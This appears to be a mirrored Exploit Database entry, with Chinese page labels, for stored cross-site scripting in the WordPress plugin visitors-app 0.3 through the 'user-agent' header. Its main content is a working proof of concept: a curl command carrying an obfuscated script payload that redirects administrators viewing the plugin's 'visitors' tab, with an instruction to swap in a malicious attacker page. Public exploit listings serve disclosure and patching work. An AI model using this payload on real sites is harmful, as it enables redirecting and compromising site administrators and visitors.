WordPress Plugin visitors-app 0.3 – ‘user-agent’ Stored Cross-Site Scripting (XSS)

• Exploit Database
• 37 阅读

• 作者： Mesut Cetin
  日期： 2021-06-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49972/

• # Exploit Title: WordPress Plugin visitors-app 0.3 - 'user-agent' Stored Cross-Site Scripting (XSS)
  # Date: 09/06/2021
  # Exploit Author: Mesut Cetin
  # Vendor Homepage: https://profiles.wordpress.org/domingoruiz/
  # Software Link: https://wordpress.org/plugins/visitors-app/
  # Version: 0.3 
  # Tested on: Debian GNU/Linux 10
  # Reference: https://wpscan.com/vulnerability/06f1889d-8e2f-481a-b91b-3a8008e00ffc
  
  ## Description:
  # A vulnerability in the WordPress plugin "visitors" version 0.3 and prior allows remote attacker through 
  # Cross-Site Scripting (XSS) to redirect administrators and visitors and potentially obtain sensitive informations
  # The 'user-agent' parameter allows attacker to escalate their privileges.
  
  ## PoC
  # Replace google.com with malicious attacker page
  curl -i http://localhost/wordpress --user-agent "</script><script>location=([]+/http:\\google.com/g).substr(1,19); </script>"
  
  # on http://localhost/wordpress/wp-admin, browse the tab "visitors"